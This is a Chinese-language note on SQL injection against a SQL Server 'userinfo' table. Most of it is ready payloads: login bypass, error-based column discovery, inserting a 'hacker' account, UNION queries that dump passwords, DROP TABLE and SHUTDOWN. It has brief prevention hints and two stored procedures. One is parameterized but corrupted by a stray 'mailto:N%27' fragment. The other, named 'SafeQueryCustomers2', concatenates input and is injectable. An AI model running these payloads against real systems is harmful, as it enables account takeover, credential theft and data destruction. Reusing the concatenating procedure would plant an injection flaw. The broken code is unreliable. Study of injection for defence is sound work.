SQL注入攻击<收藏>

-SQL注入攻击
--以任何用户登入(预防：采用参数形式)
select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
select * from  dbo.userinfo where userName=''or 1=1--'
--查看除VINET外所有信息
select * from  dbo.userinfo where userID='VINET' OR 1=1
--利用已知会员名登入
select * from  dbo.userinfo where userName='admin '--'
--利用错误一步步获取信息(预防：自定义错误提示页面)
select * from  dbo.userinfo where userName=''HAVING 1=1--'
select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
--根据上面错误信息所得数据向表插入数据（成功！）
select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
--破坏性删除表
select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
--逐步获取用户账户信息
select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' --检查类型
select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' 获取标题字段
select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' --取得所有账户名
select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' --获取账户密码信息

--停止服务（权限足够） （;DROP Database D_Name --、 ;DROP TABLE T_Name --）
select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
--

exec dbo.SafeQueryCustomers 'l','l'
exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

CREATE PROCEDURE dbo.SafeQueryCustomers
 (
 @userName nvarchar(30),
 @userPwd nvarchar(12)
 )
AS
    DECLARE @STR nvarchar(255)
    DECLARE @WK nvarchar(255)
    SET @STR = 'SELECT * FROM dbo.userinfo'
    SET @WK = ''
   
    IF NOT @userName IS NULL 
    BEGIN
       SET @WK = @WK + ' userName LIKE @puserName AND  '
       SET @userName = '%' +@userName + '%'
    END  
   
    IF NOT @userPwd IS NULL    
    BEGIN
       SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
       SET @userPwd = '%' +@userPwd + '%'
    END  
    IF LEN(@STR) > 0
    BEGIN
       SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
       exec sp_executesql @STR,
mailto:N%27@puserName nvarchar(30),@puserPwd nvarchar(12)',
@puserName=@userName,@puserPwd=@userPwd
    End  
    ELSE
       exec sp_executesql @STR
=============================================

CREATE PROCEDURE dbo.SafeQueryCustomers2
 (
 @userName nvarchar(30),
 @userPwd nvarchar(12)
 )
AS
    DECLARE @STR nvarchar(255)
    DECLARE @WK nvarchar(255)
    SET @STR = 'SELECT * FROM dbo.userinfo'
    SET @WK = ''
   
    IF NOT @userName IS NULL 
    BEGIN
       SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND  ' 
    END  
   
    IF NOT @userPwd IS NULL    
    BEGIN
       SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND  '
      
    END  
     IF LEN(@STR) > 0
    BEGIN
       SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
       exec sp_executesql @STR
    End  
    ELSE
       exec sp_executesql @STR